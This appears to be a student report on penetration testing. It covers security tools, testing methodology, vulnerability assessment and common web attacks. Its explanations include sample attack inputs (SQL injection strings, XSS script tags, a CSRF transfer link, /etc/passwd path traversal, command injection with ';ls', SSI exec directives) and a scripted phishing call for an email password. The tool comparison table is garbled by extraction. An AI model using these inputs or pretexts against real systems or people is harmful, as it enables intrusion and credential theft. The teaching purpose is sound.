John the Ripper is a fast password cracker for UNIX/Linux and Mac OS X. Its primary purpose is to detect weak Unix passwords, though it supports hashes for many other platforms as well. There is an official free version, a community-enhanced version (with many contributed patches but not as much quality assurance), and an inexpensive pro version.

Burp Suite
Burp Suite is an integrated platform for attacking web applications. It contains a variety of tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All of the tools share the same framework for handling and displaying HTTP messages, persistence, authentication, proxies, logging, alerting and extensibility. There is a limited free version and also Burp Suite Professional ($299 per user per year). Pros and cons of Burp Suite Pro Pros a. As a manual test tool it is top rated. Cons a. It lacks any Java script support which is very big limitation.

Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Hping
This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rule sets. It is also great for learning more about TCP/IP and experimenting with IP protocols. Unfortunately, it hasn't been updated since 2005. The Nmap Project created and maintains Nping, a similar program with more modern features such as IPv6 support, and a unique echo mode.

W3AF
W3af is an extremely popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities. It is easy to use and extend and features dozens of web assessment and exploitation plugins. In some ways it is like a web-focused Metasploit.

Scapy
Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. Note that Scapy is a very low-level toolyou interact with it using the Python programming language. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more.

Ping/Telnet/Dig/Traceroute/Whois/netstat
While there are many advanced high-tech tools out there to assist in security auditing, don't forget about the basics! Everyone should be very familiar with these tools as they come with most operating systems (except that Windows omits whois and uses the name tracert). They can be very handy in a pinch, although more advanced functionality is available from Hping and Netcat.

Hydra
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.

Acunetix
Acunetix Web Vulnerability Scanner crawls Web sites, including Sites hosting Flash content, analyzes Web applications and SOAP-based Web services and finds SQL injection, Cross site

scripting, and other vulnerabilities. Acunetix Web Vulnerability Scanner includes an automatic JavaScript analyzer that enables security analysis of AJAX and Web 2.0 applications, as well as Acunetixs AcuSensor Technology that can pinpoint the following vulnerabilities among others: version check; Web server configuration checks; parameter manipulations, multirequest parameter manipulations, file checks, unrestricted file upload checks, directory checks, text searches, weak HTTP passwords, hacks from the Google Hacking Database, port scanner and network alerts, other Web vulnerability checks, and other application vulnerability tests. Scanner is able to automatically fill in Web forms and authenticate against Web logins, enabling it to scan password-protected areas. Additional manual vulnerability tests are supported by the Web Vulnerability Scanners built-in penetration testing tools, e.g., Buffer overflows, Subdomain scanning. The penetration test tool suite includes (1) HTTP Editor for constructing HTTP/HTTPS requests and analyzing the Web servers response; HTTP Sniffer for intercepting, logging, and modifying HTTP/HTTPS traffic and revealing data sent by a Web application; HTTP fuzzer, for sophisticated fuzz testing of Web applications input validation and handling of unexpected and invalid random data, W(virtual) Script scripting tool for scripting custom Web attacks; Blind SQL Injector for automated database data extraction. Acunetix Web Vulnerability Scanner includes a reporting module that can generate compliance reports for PCI DSS and other regulations/standards. The scanner is offered in Small Business, Enterprise, and Consultant editions. Acunetix Web Vulnerability Scanner

2.3 Merits and Demerits of Penetration Testing tools and its graph
Acunetix Appscan Burp Suite Pro 63% Hailstorm NMAP Nessus Metasploit

Vulnerability found Vulnerability missed Scantime

54%

64%

61%

92%

91%

87%

36%

16%

53%

39%

8%

9%

11%

6.2 min

7.1 min

4.8 min

3.6 min

1.18 min

1.25 min

2.48 min

Performance

66%

68%

70%

67%

81%

76%

74.25%

Accuracy

51%

67%

62%

70%

88%

82%

79%

Reliability

59%

62%

65%

72%

93%

82%

77%

Used in Current Industry

3%

9%

2%

8.5

37.5%

19%

21%

Usage of Pentest tools in Current Industry


40 35 30 25 20 15 10 5 0 Acunetix Appscan Burp Suite Pro Hailstorm NMAP Nessus Metaspoilt

CHAPTER 3 Proposed Work

3.1 Penetration testing in current industry, 3.2 Vulnerability Assessment, 3.3 Roles and Responsibilities of Penetration testers 3.4 Proposed Work 3.1 Penetration testing in current industry
With the emergence of the Internet, web applications have penetrated deeper and deeper into the enterprise. Initially used as a public interface towards customers and mostly serving marketing purposes, web applications have grown into complex, multilayer solutions that serve diverse purposes in modern organizations and enterprises. From a public marketing interface, web applications have integrated the internal network, serving a multitude of purposes people management, accounting, support, document management, asset management, etc. Web applications have largely replaced traditional Desktop applications in most modern organizations and businesses. Services that have traditionally been served by numerous other types of applications are now often delivered by web applications. The ease of development of web applications is the primary reason for their deep integration into modern networks. However, it is also the primary reason why so many web applications are prone to often serious security weaknesses and vulnerabilities. Currently web applications are the single most attacked service type on the Internet.

Web Application Penetration Testing


The following short summary describes the general methodology used throughout Web Application Penetration Testing engagements:

Reconnaissance

Discovery

Identification

Exploitation

Rating

Reconnaissance

Passive Information gathering

Active Information gathering

Information Analysis

Discovery

Web Page Crawling

Cookies Gathering

Site Structure & Hidden pages

Identification

Vulnerability Assessment tools

Vulnerability databases

Manual Identification

Exploitation

Manual Exploitation

Custom Exploit Tools

Public Exploit Tools

Vulnerability Rating

Vulnerability rating

Tool Output Rating

The general Penetration Testing Methodology is based on a circular approach of 5 continuous phases, as described in the diagram above. During a typical engagement, the tester starts with the Reconnaissance phase, then moves forward until the Rating phase. The whole process is repeated on several occasions if needed in order to obtain results that are as accurate as possible. The Web Application Penetration Testing service is based on a methodology that is based on the OWASP web application testing methodology, but also general penetration testing methodologies, such as: OISSG ISSAF or SANS. Our vision is that although it is important to follow a general methodology, penetration testers should have the ability to change the methodology they are using and adapt it to each particular test. This vision reflects the way real attackers would proceed professional attackers will deviate from a methodology or process in order to achieve their goal. Following is a general description of the 5 phases approach that is followed throughout Web Application Penetration Testing engagements: Reconnaissance - The Reconnaissance Phase encompasses the actions taken by the security consultant to gain better knowledge about the target web application, but also its design or functions. Different methods are employed to obtain as much information as possible about the target web application, including the use of external sources, such as search engines, public forums, newsgroups, etc. The consultant will also attempt to identify precisely the target web server, application server, operating systems, development environments, back-end database, etc. Discovery - The Discovery Phase encompasses the active gathering of information from the target web application. Using a set of tools and utilities, the security consultant will attempt to list the structure of the target web site. The result from this phase is typically a detailed scheme that describes the structure of the

web application or site and that provides the consultant with important information about weak points in the application. The consultant will use the information obtained throughout the phase to select target pages that are likely to contain security issues and vulnerabilities (ie. dynamic pages). Identification - During the Vulnerability Identification phase, the security consultant will attempt to identify security weaknesses, vulnerabilities or issues in the list of resources that were identified throughout the previous phases. The identification of security vulnerabilities and weaknesses in the target web application is performed using several methods, including the use of vulnerability assessment tools and utilities, the use of vulnerability databases and manual vulnerability identification. Exploitation - The Vulnerability Exploitation phase is the most critical part of a Web Application Penetration Testing engagement. During this phase, the security consultant will attempt to exploit the vulnerabilities that were previously discovered by performing an actual attack against the services in question. Several methods for exploitation are used, including manual exploitation, the use of custom exploitation scripts and the use of publicly available security exploits.

Rating - The primary objective of the Vulnerability Rating phase is to objectively rate the security vulnerabilities and weaknesses that have been discovered throughout the previous testing phases and to prepare all information that will be needed for the penetration testing report. The tester will also save all log information such as attack tool output, attack screenshots and vulnerability assessment scan reports. If the optional logging of packet captures was ordered the captures will be stored for the retention period.

3.2 Vulnerability Assessment Vulnerability: A flaw or weakness in system security procedures, design, implementation, or
internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the systems security policy. Vulnerability assessments are a crucial component to network security and the risk management process. Internetworks and Transmission Control Protocol/Internet Protocol (TCP/IP) networks have grown exponentially over the last decade. Along with the advent of this growth, computer vulnerabilities and malicious exploitation have increased. Operating system updates, vulnerability patches, virus databases, and security bulletins are becoming a key resource for any savvy network administrator or network security team. It is the application of the patches and use of knowledge gained from these resources that actually make the difference between a secure network system and a network used as a backdoor playground for malicious hacker attacks. Starting with a system baseline analysis, routine vulnerability assessments need to be performed and tailored to the needs of the company to maintain a network system at a relatively secure level. There are two types of vulnerability assessments: network-based and hostbased. The assessment can be carried out either internally or outsource to a third-party vendor like Foundstone (www.foundstone.com) or Vigilante (www.vigilante.com). The initial vulnerability assessment should be performed internally with collaboration between the Information Technology (IT) department and upper management using the host-based approach. The scope of this paper outlines methods and guidelines to perform a basic hostbased vulnerability assessment with a review of the risk management process, performing a system baseline assessment, and finally, a basic vulnerability assessment.

Once the credible threats are identified, a vulnerability assessment must be performed. The vulnerability assessment considers the potential impact of loss from a successful attack as well as the vulnerability of the facility/location to an attack. Impact of loss is the degree to which the mission of the agency is impaired by a successful attack from the given threat. A key component of the vulnerability assessment is properly defining the ratings for impact of loss and vulnerability. These definitions may vary greatly from facility to facility. For example, the amount of time that mission capability is impaired is an important part of impact of loss. If the facility being assessed is an Air Route Traffic Control Tower, a downtime of a few minutes may be a serious impact of loss, while for a Social Security office a downtime of a few minutes would be minor. A sample set of definitions for impact of loss is provided below. These definitions are for an organization that generates revenue by serving the public.

Devastating: The facility is damaged/contaminated beyond habitable use. Most items/assets are lost, destroyed, or damaged beyond repair/restoration. The number of visitors to other facilities in the organization may be reduced by up to 75% for a limited period of time. Severe: The facility is partially damaged/contaminated. Examples include partial structure breach resulting in weather/water, smoke, impact, or fire damage to some areas. Some items/assets in the facility are damaged beyond repair, but the facility remains mostly intact. The entire facility may be closed for a period of up to two weeks and a portion of the facility may be closed for an extended period of time (more than one month). Some assets may need to be moved to remote locations to protect them from environmental damage. The number of visitors to the facility and others in the organization may be reduced by up to 50% for a limited period of time. Noticeable: The facility is temporarily closed or unable to operate, but can continue without an interruption of more than one day. A limited number of assets may be damaged, but the majority of the facility is not affected. The number of visitors to the facility and others in the organization may be reduced by up to 25% for a limited period of time.

Minor: The facility experiences no significant impact on operations (downtime is less than four hours) and there is no loss of major assets.

Vulnerability is defined to be a combination of the attractiveness of a facility as a target and the level of deterrence and/or defense provided by the existing countermeasures. Target attractiveness is a measure of the asset or facility in the eyes of an aggressor and is influenced by the function and/or symbolic importance of the facility. Sample definitions for vulnerability ratings are as follows:

Very High: This is a high profile facility that provides a very attractive target for potential adversaries, and the level of deterrence and/or defense provided by the existing countermeasures is inadequate. High: This is a high profile regional facility or a moderate profile national facility that provides an attractive target and/or the level of deterrence and/or defense provided by the existing countermeasures is inadequate. Moderate: This is a moderate profile facility (not well known outside the local area or region) that provides a potential target and/or the level of deterrence and/or defense provided by the existing countermeasures is marginally adequate. Low: This is not a high profile facility and provides a possible target and/or the level of deterrence and/or defense provided by the existing countermeasures is adequate.

The vulnerability assessment may also include detailed analysis of the potential impact of loss from an explosive, chemical, or biological attack. Professionals with specific training and experience in these areas are required to perform these detailed analyses.

A vulnerability assessment is the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system. Examples of systems for which vulnerability assessments are performed include, but are not limited to, information technology systems, energy supply systems, water supply systems, transportation systems, and communication systems. Such assessments may be conducted on behalf of a range of different organizations, from small businesses up to large regional infrastructures. Vulnerability from the perspective of disaster management means assessing the threats from potential hazards to the population and to infrastructure. It may be conducted in the political, social, economic or environmental fields. Vulnerability assessment has many things in common with risk assessment. Assessments are typically performed according to the following steps: 1. 2. 3. 4. Cataloging assets and capabilities (resources) in a system. Assigning quantifiable value (or at least rank order) and importance to those resources Identifying the vulnerabilities or potential threats to each resource Mitigating or eliminating the most serious vulnerabilities for the most valuable resources A vulnerability assessment is the process of running automated tools against defined IP addresses or IP ranges to identify known vulnerabilities in the environment. Vulnerabilities typically include unpatched or mis-configured systems. The tools may be commercially available versions, such as Nessus or Saint or open source free tools such as OpenVAS. The commercial versions typically include a subscription to maintain up to date vulnerability signatures similar to antivirus software subscriptions. The commercially available tools provide a straight forward method to performing vulnerability scanning. Organizations may also choose to use open source versions of vulnerability scanning tools. The advantage of open source tools is that you are using the tools

of the trade commonly used by hackers. Most hackers are not going to pay $2,000 for a subscription to Nessus but will opt for the free version of tools. However, by using a commercially licensed vulnerability scanner the risk is low that malicious code is included in the tool. The purpose of a vulnerability scan is to identify known vulnerabilities so they can be remediated, typically through the application of vendor supplied patches. Vulnerability scans are key to organizations vulnerability management program. The scans are typically run at least quarterly. Vulnerabilities are remediated by the IT department until the next scan is run and the new list of vulnerabilities is identified that needs to be addressed. A vulnerability assessment is an automated scan to determine basic flaws in a system. This can be either network or application vulnerability scanning, or a combination of both. The common factor here is that the scan is automated and generates a report of vulnerabilities or issues that may need to be addressed. In a network vulnerability scan, software looks at a set list of IP addresses to determine what services are listening across the network, and also what software (including versions of the software) are running. Limited tests are run against the listening services, including attempts to login with default account credentials, or comparing the versions of software against known vulnerable versions. If a match is found, it is recommended that the listening port be closed off and/or the software be upgraded if possible. Application vulnerability scanning can take either or both of two approaches:

Static Code Analysis: If you own the codebase of your application, the best place to start is by secure coding practices. It is a good idea to have code review as part of your software development process. Static Code Analysis involves more work upfront but results in much more robust applications. Dynamic Code Analysis is the next step, and its done by taking a black box approach to the app, and trying to probe it with tools similar to scanners that will perform injections and try to crash or bypass controls in the application. This is an automated process, and there are some inexpensive or free tools from Cenzic, Whitehat and Veracode, among others, that can do this on a basic level and offer different versions of this type of scan.

Identifying Vulnerabilities
A vulnerability assessment uses a combination of various methodologies to identify vulnerabilities including:

1.Patch correlation - identifying the flaw by looking to see if the patch for the flaw is missing 2. Version correlation - identifying the flaw by looking at the software version in question 3. Configuration correlation - identifying the flaw based on system configurations 4. Policy correlation - identifying the flaw based on policy, procedure, and specification analysis 5. Inferred correlation - identifying the flaw based on presence of software, services, other flaws, etc. 6. Response correlation - identifying the flaw based on results of an exploit attempt 7. Social correlation - identifying the flaw based on social situations

Misconception #1 - A vulnerability assessment just finds vulnerabilities. It does not exploit them. The methodology used for the activity does not determine whether the activity is a vulnerability assessment or a penetration test. However, the methodology used for vulnerability identification may affect correctness and completeness of identification, which will in turn affect the overall outcome of the assessment. Each of the methods is useful to varying degrees in different scenarios. No one method is clearly better than another method in all cases. Regardless of how we enumerate the vulnerabilities, we now have them. Notice that in some cases, we actually exploited the vulnerabilities to directly or indirectly identify the presence of the vulnerability. Performing the exploitation did not move us out of the realm of a vulnerability assessment (misconception point #1). We could potentially run every single exploit for every vulnerability as our means of vulnerability identification, if we had exploits for every vulnerability that we wanted to identify. However, realizing that an attempt to exploit a vulnerability may cause disruption to computer networks, may not actually confirm the vulnerability, or even worse, may cause the assessed system to crash, we often substitute such exploitation in favor of other methods such as patch validation. The results are most often more accurate and less disruptive than exploitive vulnerability identification. Vulnerability Valuation Vulnerabilities are ranked and classified based on a variety of factors including: 1. Severity Confidentiality, Integrity and Availability values for a flaw if it is exploited 2. Exploitability - How easy is it to exploit the flaw 3. Relevance - How new or old is the flaw 4. Organizational risk How valuable is the resource bearing the vulnerability to the company These factors allow us to properly assess our target and provide a valuation that makes sense given all of the defined factors. Finally, as part of the assessment, it is typically assumed that you provide mitigation strategies to improve the security of the resource. Strictly speaking, this is not part of the assessment process. It is generally assumed that when you are given an assessment, you will be provided information regarding improving your valuation but that is an additional service to an assessment. Some vulnerability assessment vendors will provide very little information, some provide fully managed remediation, and many fall in between.

Penetration Test Clarity


In essence, the purpose of a penetration test in this context is to test an assertion. Here we are testing the assertion made by an organization that the "something" is sufficiently impenetrable. In other words, we are testing an assertion from an organization that they have done all they need to do to secure the resources they want to secure. They have fixed some vulnerabilities, mitigated others, transferred risk for others, and finally accepted risk for the remaining such that the "something" is sufficiently secure. Examples of some assertions organizations require penetration tests to examine are: 1. All user passwords are strong on critical systems. 2. Physical access to my server room is solid. 3. My domain administrator access on my domain is secure. 4. Customer data (e.g. credit card information) resident on my systems is not accessible to unauthorized users.

All of these are goals for a penetration test. The organization asserts that they have sufficiently protected themselves to the degree that the assertions should prove to be true. PCI Data Security Standard requirement 11.3 requires that an organization that stores credit card holder data engage in a penetration test to validate that this information is secure3. In essence, PCI requires that the organization assert that they are secure in this regard and requires that the organization test this assertion. With this defined, I raise the following misconception regarding penetration testing as it relates to vulnerability assessments: Misconception #2 - A penetration test is testing to see if vulnerabilities are actually present In a penetration test the "something" that we are testing is not the validity of the found vulnerabilities. If we wanted more accurate vulnerability identification, we would ensure that we used more accurate means to identify vulnerabilities. We would not use a penetration test to validate them. Once again, penetration testing assesses the organization's assertion that they are secure. Another misconception regarding penetration testing is: Misconception #3 - Penetration tests only involve network hacking tools. A penetration test, as seen above, is simply a test that examines an assertion by the organization for a given goal. It may involve the use of social engineering tactics, physical security hacking tactics, Google hacking, and of course, the use of network hacking tools.

Vulnerability Assessment and Penetration Test Relations


The relationship between a vulnerability assessment and a penetration test is analogous to the academic activities of students studying for an exam and then taking an exam. It is unwise for a student to take an exam without adequate study preparation. When the student attends the exam on exam day, they are in essence asserting that they understand the material. The exam may only test a small part of material at hand and its goal is to confirm the student's assertion. A penetration test may appear similar to a vulnerability assessment because it involves vulnerability enumeration to some extent. However, it will likely not be exhaustive and therefore will not include an identification of vulnerabilities to the same extent of a vulnerability assessment. Penetration tests are resource intense and are goal oriented. Like an attacker, a penetration tester will take the easiest route to achieving the goal or set of goals. The following figure illustrates the relation between Vulnerability Management and Penetration Testing:

As depicted above, an organization bearing security risk should engage in an ongoing vulnerability management program. Although not shown in the above diagram, the program should consist of ongoing measurements that determine the risk level. The organization should only engage in a penetration test when they have done what they can to lower the risk to the desired level. At some point in time, the organization should assert that they are confident that they have secured what is important and only then should they engage in a penetration test. Vulnerability Detection After having gathered the relevant information about the targeted system, the next step is to determine the vulnerability that exists in each system. Penetration testers should have a collection of exploits and vulnerabilities at their disposal for this purpose. The knowledge of the penetration tester in this case would be put to test. An analysis will be done on the information obtained to determine any possible vulnerability that might exist. This is called manual vulnerability scanning as the detection of vulnerabilities is done manually. There is an exploit known as the dot bug that existed in MS Personal Web Server back in 1998. This is a bug that existed in IIS 3.0 that allowed ASP source code to be downloaded by appending a . to the filename. Microsoft eventually fixed this bug but they did not fix the same hole in their Personal Web Server at that time. Some Personal Web Servers has this vulnerability until today. If a system running Windows 95 and MS Personal Web Server pops up in the information gathered earlier, this would probably be a vulnerability that might exist in that particular system. There are tools available that can automate vulnerability detection. Such a tool is Nessus (http://www.nessus.org). Nessus is a security scanner that audit remotely a given network and determine whether vulnerabilities exists in it. It produces a list of vulnerabilities that exist in a network as well as steps that should be taken to address these vulnerabilities.

SQL injection
SQL injection can occur when invalidated user input is used to construct an SQL query that is then executed by the web server. A very well known example is a query used by a user login. This query is usually like "SELECT * FROM users WHERE username='entered username' AND password='entered password' ". If an attacker enters the string x' OR '1'='1 in both the username and the password then query becomes "SELECT * FROM users WHERE username='x' OR '1'='1' AND password='x' OR '1'='1' ". Because '1' is always equal to '1', this query is true for all records in the database. There are two different types of SQL injection: blind SQL injection and "normal" SQL injection. The difference between these two types is that for "normal" SQL injection the server shows an error message when the SQL queries syntax in incorrect, for blind SQL injection this error message is not shown. Instead the attacker will see a generic error message or page. "Normal" SQL injection can be tested for by entering characters like quotes to create a query with an incorrect syntax and search the page for error messages about it. Blind SQL injection cannot be detected this way, instead the attacker has to enter SQL commands like sleep or statements that are always true or false. For instance trying both strings ' AND '1'='1 and ' AND '1'='2 will likely produce different results if the page is vulnerable to SQL injection.

XPath injection
XPath injection (aka Blind XPath Injection)) is similar to SQL injection. The difference between these two vulnerabilities is that SQL injection takes place in a SQL database, whereas XPath injection takes place in an XML file as XPath is a query language for XML data. Just like SQL injection the attack is based on sending malformed information to the web application. This way the attacker can discover how the XML data is structured or access data he is not allowed to.

Just like SQL injection, there are two types of XPath injection: "normal" XPath injection and blind XPath injection. The difference between these two types of XPath injection is that for blind XPath injection the attacker has no knowledge about the structure of the XML document and the application does not provide useful error messages. Testing for XPath injection is also similar to SQL injection. The first step would be to insert a quote in an input _eld to see if it produces an error message. For blind XPath injection data is injected to create a query that always produces true or false.

XSS
Cross-site scripting, often abbreviated as XSS. In short, it occurs when an attacker can input HTML code (such as Javascript), that will then be executed for the visitors of the site. An example would be a guest book that shows the text that is entered in the guest book on the website. If an attacker enters the string <script>alert('XSS');</script> a pop-up with the text "XSS" would be shown on that page of the guest book. This type of vulnerability can also be exploited in a more serious way. An attackers might use XSS to steal a user's cookie, which can then be used to impersonate the user on a website There are three diffrent types of XSS: stored XSS, reflected XSS and DOM based XSS. The diffrences between these types are that, for stored XSS the attacker's code is stored on the web server , whereas for reflected XSS the attacker's code is added to a link to the web application (e.g. in a GET parameter) and the attacker has to trick a user into clicking on the link. Such a link would look like http://www.example.com/index.php?input=<script>alert('XSS');</script>. For Dom based XSS the attacker's code is not injected in the web application, instead the attacker uses existing Javascript code on the target page to write text (e.g. <script>alert('XSS');</script> on the page. To test for this vulnerability, a penetration testing tool should try to input HTML code in the inputs on a web application.

Cross site tracing


Cross Site Tracing often abbreviated as XST is an attack that abuses the HTTP TRACE function. This function can be used to test web applications as the web server replies the same data that is sent to it via the TRACE command. An attacker can trick the web application in sending its normal headers via the TRACE command. This allows the attacker to be able to read information in the header such as a cookie. To test for this vulnerability, the penetration testing tool will have to request OPTIONS from the web server and see if the headers Allow: TRACE are present. If that is present, the tool should try to request the page via the TRACE command.

CSRF
Cross-Site Request Forgery, often abbreviated as CSRF, is an attack where an attacker tricks a user's browser into loading a request that performs an action on a web application that user is currently authenticated to. For example an attacker might post the following HTML on a website or send it in an HTML email <img src="http://www.bank.com/transfer_money?amount=10000&target_account=12345"> . If the user is authenticated at his bank website (at http://www.bank.com) when this link is loaded it would transfer 10000 from the user's account to bank account number 12345 Testing for this attack is pretty similar to testing for XSS, the tool will have to check if it can inject a link that may have effect on another web application (e.g. the link of the example) into the web application that is being tested.

Local File inclusion


Local File inclusion, also known as path traversal or directory traversal ('Path Traversal'),means that a file on the same server as the one where the web application is running is included on the page. A common example would be a web application with the URL http://www.example.com/index.php?_le=somefile.txt, by manipulating the file parameter , the attacker might be able to load a file that he should not be able to see. A tool can test for this vulnerability by entering a path to a local file (usually /etc/passwd) in an input or GET parameter. This can be done with an absolute path (e.g. /etc/passwd) or a relative path (e.g. ../../../../../etc/passwd). The tool will then have to check if the contents of the local fie are present on the page.

Remote File inclusion


Remote file inclusion is equal to local file inclusion, except for that the file that is included is a file from a different server than the one the web application is running on. An example of this vulnerability is the same as for local file inclusion. However, instead of changing the file name parameter to a local file, the attacker should enter a path to a remote file. Testing for this vulnerability is also similar to local file inclusion. However, instead of a path to a local file a path to a remote file should be used (e.g. http://www.something.com/index.html ).

HTTP response splitting


HTTP Response Splitting, also known as CRLF is an attack where the attacker can control the data that is used in an HTTP response header and enters a newline in this data. For example, if a web application uses a redirect via a GET parameter (e.g. http://www.example.com/index.php?page=somepage.html ), this redirect is sent via the HTTP headers to the browser (the "Location" header). An attacker can append a newline to the value of the GET parameter and add his own headers. This way an attacker can add a "normal" response header and can cause text to appear on the web application this way. A penetration testing tool would have to enter a newline, followed by a HTTP header, in inputs that may be present in the HTTP response header. The tool will then have to check whether the server returns the data that is inputted in the header by the attacker.

Command injection
Command injection means that the attacker can execute a command on the server. An example would be a web application that lets the user enter an IP address that the server will then send a ping to. If an attacker would enter the string 1.2.3.4;ls the server would send a ping to the IP address 1.2.3.4 and run the command "ls". This vulnerability can be tested by a penetration testing tool by entering a semicolon followed by a command (e.g. "ls") into an input field that may be vulnerable and checking if the response of the web application contains the output of the injected command.

SSI injection
Server-Side Includes Injection ,often abbreviated to SSI injection is an attack where the attacker can enter SSI directives (e.g. <!#includefille="file.txt" _> or <!#exec cmd="ls -l" _>) that are then executed by the web server. To test for SSI injection a penetration testing tool would have to enter SSI directives in the inputs on a web application and see if the web server executes these by searching the web page for results of the SSI directive.

Buffer overfow
In short, a buffer overflow occurs when an application tries to store more data in a buffer than the buffer can hold. Testing for buffer overflows is relatively easy. The tool will have to input long (random) data and see if it produces any errors caused by trying to store more data than fits in the buffer.

Penetration Attempt
After determining the vulnerabilities that exist in the systems, the next stage is to identify suitable targets for a penetration attempt. The time and effort that need to put in for the systems that have vulnerabilities need to be estimated accordingly. Estimations on how long a penetration test takes on a particular system are important at this point. The target chosen to perform the penetration attempt is also important. Imagine a scenario whereby two penetration testers are required to perform a penetration test on a network consisting of more than 200 machines. After gathering sufficient information and vulnerabilities about the network, they found out that there are only 5 servers on the network and the rest are just normal PCs used by the organizations staff. Common sense will tell these them that the likely target would be these 5 servers. One practice that most organizations do is to name their machines in a way that they understand what the machine does. The computer name of the target is sometimes a decisive factor for choosing targets. Often after a network survey you would find computer names like SourceCode_PC, Int_Surfing and others that give penetration testers an idea of what the machine does. By choosing their target properly, penetration testers will not waste time and effort doing any redundant job. Normally penetration tests have a certain time constraint and penetration testers should not waste any time unnecessarily. There are other ways to choose a target. The above just demonstrates some criteria used. After choosing the suitable targets, the penetration attempt will be performed on these chosen targets. There are some tools available for free via the Internet but they generally require customization. Knowing that a vulnerability exist on a target does not always imply that it can be exploited easily. Therefore it is not always possible to successfully penetrate even though it is theoretically possible. In any case exploits that exist should be tested on the target first before conducting any other penetration attempt. Password cracking has become a normal practice in penetration tests. In most cases, youll find services that are running on systems like telnet and ftp. This is a good place to start and use our password cracking methods to penetrate these systems. The list below shows just some of the password cracking methods used: Dictionary Attack Uses a word list or dictionary file. Hybrid Crack - Tests for passwords that are variations of the words in a dictionary file. Brute Force - Tests for passwords that are made up of characters going through all the combinations possible. Theres a very good tool that can be used to automate telnet and ftp account cracking. This tool is called Brutus. The penetration attempts do not end here. There are two more suitable methods to attempt a penetration. This is through social engineering and testing the organizations physical security. Social engineering is an art used by hackers that capitalizes on the weakness of the human element of the organizations defense. The dialog below shows an example how an attacker can exploit the weakness of an employee in a large organization. Attacker: Hi Ms Lee, this is Steven from the IS Department. Ive found a virus stuck in your mail box and would like to help you remove it. Can I have the password

to your email ? Ms Lee (the secretary): A virus ? Thats terrible. My password is magnum. Please help me clean it up Theres no harm in deploying social engineering and using it numerous times to obtain critical information from the organizations employees. This of course is bound to the agreement that the organization allows such methods to be used during the penetration tests. Physical security testing involves a situation of penetration testers trying to gain access to the organizations facility by defeating their physical security. Social engineering can be used to get pass the organizations physical security as well. The main focus of this paper is penetration testing but there is often some confusion between penetration testing and vulnerability assessment. The two terms are related but penetration testing has more of anemphasis on gaining as much access as possible while vulnerability testing places the emphasis on identifying areas that are vulnerable to a computer attack. An automated vulnerability scanner will often identify possible vulnerabilities based on service banners or other network responses that are not in fact what they seem. A vulnerability assessor will stop just before compromising a system, whereas a penetration tester will go as far as they can within the scope of the contract. It is important to keep in mind that you are dealing with a Test. A penetration test is like any other test in the sense that it is a sampling of all possible systems and configurations. Unless the contractor is hired to test only a single system, they will be unable to identify and penetrate all possible systems using all possible vulnerabilities. As such, any Penetration Test is a sampling of the environment. Furthermore, most testers will go after the easiest targets first.

How Vulnerabilities Are Identified


Vulnerabilities need to be identified by both the penetration tester and the vulnerability scanner. The steps are similar for the security tester and an unauthorized attacker. The attacker may choose to proceed more slowly to avoid detection, but some penetration testers will also start slowly so that the target company can learn where their detection threshold is and make improvements. The first step in either a penetration test or a vulnerability scan is reconnaissance. This is where the tester attempts to learn as much as possible about the target network as possible. This normally starts with identifying publicly accessible services such as mail and web servers from their service banners. Many servers will report the Operating System they are running on, the version of software they are running,patches and modules that have been enabled, the current time, and perhaps even some internal information like an internal server name or IP address. Once the tester has an idea what software might be running on the target computers, that information needs to be verified. The tester really doesnt KNOW what is running but he may have a pretty good idea. The information that the tester has can be combined and then compared with known vulnerabilities, and then those vulnerabilities can be tested to see if the results support or contradict the prior information. In a stealthy penetration test, these first steps may be repeated for some time before the tester decides to launch a specific attack. In the case of a strict vulnerability assessment, the attack may never be launched so the owners of the target computer would never really know if this was an exploitable vulnerability or not.

VULNERABILITY IDENTIFICATION
The analysis of the threat to an IT system must include an analysis of the vulnerabilities associated with the system environment. The goal of this step is to develop a list of system vulnerabilities (flaws or weaknesses) that could be exploited by the potential threat-sources.

Vulnerability: A flaw or weakness in system security procedures, design, implementation, or

internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the systems security policy. Vulnerability Terminated employees system identifiers (ID) are not removed from the system Company firewall allows inbound telnet, and guest ID is enabled on XYZ server The vendor has identified flaws in the security design of the system; however, new patches have not been applied to the system Data center uses water sprinklers to suppress fire; tarpaulins to protect hardware and equipment from water damage are not in place Threat-Source Terminated employees Threat Action Dialing into the companys network and accessing company proprietary data Using telnet to XYZ server and browsing system files with the guest ID Obtaining unauthorized access to sensitive system files based on known system vulnerabilities Water sprinklers being turned on in the data center

Unauthorized users (e.g., hackers, terminated employees, computer criminals, terrorists) Unauthorized users (e.g., hackers, disgruntled employees, computer criminals, terrorists) Fire, negligent persons

Recommended methods for identifying system vulnerabilities are the use of vulnerability sources, the performance of system security testing, and the development of a security requirements checklist. It should be noted that the types of vulnerabilities that will exist, and the methodology needed to determine whether the vulnerabilities are present, will usually vary depending on the nature of the IT system and the phase it is in, in the SDLC: If the IT system has not yet been designed, the search for vulnerabilities should focus on the organizations security policies, planned security procedures, and system requirement definitions, and the vendors or developers security product analyses (e.g., white papers). If the IT system is being implemented, the identification of vulnerabilities should be expanded to include more specific information, such as the planned security features described in the security design documentation and the results of system certification test and evaluation. If the IT system is operational, the process of identifying vulnerabilities should include an analysis of the IT system security features and the security controls, technical and procedural, used to protect the system.

Preventing and detecting security vulnerabilities in Web applications


